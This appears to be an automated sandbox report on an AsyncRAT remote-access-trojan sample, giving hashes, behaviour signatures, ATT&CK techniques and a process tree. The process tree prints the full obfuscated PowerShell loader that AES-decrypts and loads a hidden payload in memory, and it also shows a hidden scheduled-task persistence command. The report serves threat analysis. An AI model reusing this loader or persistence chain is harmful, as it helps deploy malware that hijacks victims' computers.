asyncrat | 037565e9535d9521ad3ab3cfef0e6e91cad24b8e1cab83af7949dae67d95fb5c

General

Target

test.bat
Size

48KB
MD5

106c27af68b78b8670267a5eebfc8040
SHA1

a2bbfb23b51cb1f2bb213dfe410601bc7fa53875
SHA256

037565e9535d9521ad3ab3cfef0e6e91cad24b8e1cab83af7949dae67d95fb5c
SHA512

7de6b4f739f209c11cadee9360d5cb799b77bc5d4083b706a4d9bc21f501bb45e218715dbca6cd61811458b0efd190dba06dc04141650a48d91a305abf8e4600
SSDEEP

768:0oEB9ZEYgBM1D1gozT1RjnAKRc1pU9/gnEiCsfhh8pRA9buJsgsSxQ:jErqY7coz0JagnEtqh8pYbFgsSxQ

Score

10^/10

asyncrat rat

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Executes dropped EXE 2 IoCs

Processes:

test.bat.exekkdvhk.bat.exe

pid process

4248 test.bat.exe
4440 kkdvhk.bat.exe

pid	process
4248	test.bat.exe
4440	kkdvhk.bat.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

test.bat.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	test.bat.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

31 api.ipify.org
32 api.ipify.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3928 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1628 timeout.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

test.bat.exepowershell.exekkdvhk.bat.exe

pid process

4248 test.bat.exe
4248 test.bat.exe
2548 powershell.exe
2548 powershell.exe
4440 kkdvhk.bat.exe
4440 kkdvhk.bat.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

test.bat.exepowershell.exekkdvhk.bat.exe

description pid process

Token: SeDebugPrivilege 4248 test.bat.exe
Token: SeDebugPrivilege 2548 powershell.exe
Token: SeDebugPrivilege 4440 kkdvhk.bat.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

kkdvhk.bat.exe

pid process

4440 kkdvhk.bat.exe
4440 kkdvhk.bat.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

kkdvhk.bat.exe

pid process

4440 kkdvhk.bat.exe
4440 kkdvhk.bat.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

kkdvhk.bat.exe

pid process

4440 kkdvhk.bat.exe

flow	ioc
31	api.ipify.org
32	api.ipify.org

pid	process
3928	schtasks.exe

pid	process
1628	timeout.exe

pid	process
4248	test.bat.exe
4248	test.bat.exe
2548	powershell.exe
2548	powershell.exe
4440	kkdvhk.bat.exe
4440	kkdvhk.bat.exe

description	pid	process
Token: SeDebugPrivilege	4248	test.bat.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	4440	kkdvhk.bat.exe

pid	process
4440	kkdvhk.bat.exe
4440	kkdvhk.bat.exe

pid	process
4440	kkdvhk.bat.exe
4440	kkdvhk.bat.exe

pid	process
4440	kkdvhk.bat.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

cmd.exetest.bat.execmd.execmd.exepowershell.execmd.exekkdvhk.bat.exe

description	pid	process	target process
PID 2000 wrote to memory of 4248	2000	cmd.exe	test.bat.exe
PID 2000 wrote to memory of 4248	2000	cmd.exe	test.bat.exe
PID 4248 wrote to memory of 1136	4248	test.bat.exe	cmd.exe
PID 4248 wrote to memory of 1136	4248	test.bat.exe	cmd.exe
PID 4248 wrote to memory of 1660	4248	test.bat.exe	cmd.exe
PID 4248 wrote to memory of 1660	4248	test.bat.exe	cmd.exe
PID 1136 wrote to memory of 2548	1136	cmd.exe	powershell.exe
PID 1136 wrote to memory of 2548	1136	cmd.exe	powershell.exe
PID 1660 wrote to memory of 1628	1660	cmd.exe	timeout.exe
PID 1660 wrote to memory of 1628	1660	cmd.exe	timeout.exe
PID 2548 wrote to memory of 2212	2548	powershell.exe	cmd.exe
PID 2548 wrote to memory of 2212	2548	powershell.exe	cmd.exe
PID 2212 wrote to memory of 4440	2212	cmd.exe	kkdvhk.bat.exe
PID 2212 wrote to memory of 4440	2212	cmd.exe	kkdvhk.bat.exe
PID 4440 wrote to memory of 3928	4440	kkdvhk.bat.exe	schtasks.exe
PID 4440 wrote to memory of 3928	4440	kkdvhk.bat.exe	schtasks.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2000

C:\Users\Admin\AppData\Local\Temp\test.bat.exe
"test.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $IDBqQ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\test.bat').Split([Environment]::NewLine);foreach ($tScli in $IDBqQ) { if ($tScli.StartsWith(':: ')) { $NZVFu = $tScli.Substring(3); break; }; };$UPeLj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NZVFu);$OYivd = New-Object System.Security.Cryptography.AesManaged;$OYivd.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OYivd.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OYivd.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9jIvbQQrMXVTkWeSQpp2Gn0UtOPOB2NCbMxKhJ10/nw=');$OYivd.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('krrHd9BxMDg+kQ5ve/eVnA==');$mtmak = $OYivd.CreateDecryptor();$UPeLj = $mtmak.TransformFinalBlock($UPeLj, 0, $UPeLj.Length);$mtmak.Dispose();$OYivd.Dispose();$Tiyba = New-Object System.IO.MemoryStream(, $UPeLj);$sbkvz = New-Object System.IO.MemoryStream;$CwlxS = New-Object System.IO.Compression.GZipStream($Tiyba, [IO.Compression.CompressionMode]::Decompress);$CwlxS.CopyTo($sbkvz);$CwlxS.Dispose();$Tiyba.Dispose();$sbkvz.Dispose();$UPeLj = $sbkvz.ToArray();$nxXvq = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($UPeLj);$ZqEhy = $nxXvq.EntryPoint;$ZqEhy.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4248

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\kkdvhk.bat"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\kkdvhk.bat"'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kkdvhk.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2212

C:\Users\Admin\AppData\Local\Temp\kkdvhk.bat.exe
"kkdvhk.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $ycEjV = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\kkdvhk.bat').Split([Environment]::NewLine);foreach ($JZwIC in $ycEjV) { if ($JZwIC.StartsWith(':: ')) { $gNAqX = $JZwIC.Substring(3); break; }; };$FdXPE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($gNAqX);$Cdlag = New-Object System.Security.Cryptography.AesManaged;$Cdlag.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Cdlag.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Cdlag.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oRXTGHYdT6h41CeuzLxoMvi1sVhN6UEuCiUGgy+LW/c=');$Cdlag.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iGxPuI0QAxRaE4LwCEozrA==');$PhcUS = $Cdlag.CreateDecryptor();$FdXPE = $PhcUS.TransformFinalBlock($FdXPE, 0, $FdXPE.Length);$PhcUS.Dispose();$Cdlag.Dispose();$cJsyq = New-Object System.IO.MemoryStream(, $FdXPE);$fRsab = New-Object System.IO.MemoryStream;$MxGao = New-Object System.IO.Compression.GZipStream($cJsyq, [IO.Compression.CompressionMode]::Decompress);$MxGao.CopyTo($fRsab);$MxGao.Dispose();$cJsyq.Dispose();$fRsab.Dispose();$FdXPE = $fRsab.ToArray();$LfPuJ = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($FdXPE);$NJmay = $LfPuJ.EntryPoint;$NJmay.Invoke($null, (, [string[]] ('')))
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4440

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "window" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\kkdvhk.bat.exe" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:3928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9CD1.tmp.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:1660

C:\Windows\system32\timeout.exe
timeout 2
4⤵
- Delays execution with timeout.exe
PID:1628

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
2KB

MD5
dac98a0214c1ceaa27249e996ba1bf5d

SHA1
e04dbe3408917b1e9c68e68b60b4ecbea4a2e18b

SHA256
b0a9fd9b70c4aabb4fc2057dac5b6917a8a94f617fe8ca2c569adda1df4baf39

SHA512
85d3ef8cc4c9876c15b3d3818e889a3bf97474b65816e023a170b3a04995a17a60ecbf01778d598b00a39d5bdbcdd76701955a7060e955dc9952d45d213a393e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
d30b705af048dbaea0109a679232e8f4

SHA1
0adbe2a16597f8390768433d8e8b74c4fcc7d33f

SHA256
1741beb08d1ff9afce47405242d27f5572d2679d2461e88571c678534cddf7a0

SHA512
341733b48ba880116ed6a6608c0e7b1c95274b094927c76528cf146b05057d8b0f0619ca5d8e848f9ca7ef8d9fd3ca485af79c404ba5d5dc1d00e904b06be0d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\kkdvhk.bat
Filesize
325KB

MD5
124d77a122b47dd5280881b0bf22bb64

SHA1
ff6e32a3d7810a9b859ff8632fd782ae693c98d0

SHA256
841d4067dcc1a5d659dd291874c3692a7a171e1c29b0bd8192af96df175ce90d

SHA512
8c7e5d72add1de3d90263eee1779f983df0df86990494fa1efbf000de50320612bab7c6e7d3c5e9e1383a9d9ceb2f403012c7c90e2b1442ce55045211d1477b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\kkdvhk.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\kkdvhk.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9CD1.tmp.bat
Filesize
160B

MD5
cb33cd5c493cd82da9873bc510dec736

SHA1
8ca56ab52eb437e85efffee631ea559975b14f5f

SHA256
7ad9ca6e2ef09d551120f63721fe0619e123695a2a4cf0f0191a3de4f794c547

SHA512
dc929333a4a56a3c0e37c0def4915d571e91e668aeb4cfd6382f649ca805e773f9a1338a4a6b71f12ac87669222404d955380e3b60554f6ff511b2a3a271e751

Download Submit
memory/1136-139-0x0000000000000000-mapping.dmp

Download
memory/1628-143-0x0000000000000000-mapping.dmp

Download
memory/1660-140-0x0000000000000000-mapping.dmp

Download
memory/2212-146-0x0000000000000000-mapping.dmp

Download
memory/2548-147-0x00007FFA12860000-0x00007FFA13321000-memory.dmp

Filesize
10.8MB

Download
memory/2548-141-0x0000000000000000-mapping.dmp

Download
memory/3928-155-0x0000000000000000-mapping.dmp

Download
memory/4248-134-0x00000260EE6A0000-0x00000260EE6C2000-memory.dmp

Filesize
136KB

Download
memory/4248-149-0x00007FFA12860000-0x00007FFA13321000-memory.dmp

Filesize
10.8MB

Download
memory/4248-135-0x00007FFA12860000-0x00007FFA13321000-memory.dmp

Filesize
10.8MB

Download
memory/4248-151-0x00007FFA12860000-0x00007FFA13321000-memory.dmp

Filesize
10.8MB

Download
memory/4248-137-0x00000260F1BF0000-0x00000260F1C66000-memory.dmp

Filesize
472KB

Download
memory/4248-132-0x0000000000000000-mapping.dmp

Download
memory/4248-138-0x00000260EE800000-0x00000260EE81E000-memory.dmp

Filesize
120KB

Download
memory/4440-148-0x0000000000000000-mapping.dmp

Download
memory/4440-153-0x00007FFA12860000-0x00007FFA13321000-memory.dmp

Filesize
10.8MB

Download
memory/4440-156-0x000002CFFFD80000-0x000002CFFFDD0000-memory.dmp

Filesize
320KB

Download
memory/4440-157-0x000002CFFFE90000-0x000002CFFFF42000-memory.dmp

Filesize
712KB

Download
memory/4440-158-0x000002D0001D0000-0x000002D000392000-memory.dmp

Filesize
1.8MB

Download
memory/4440-159-0x00007FFA12860000-0x00007FFA13321000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads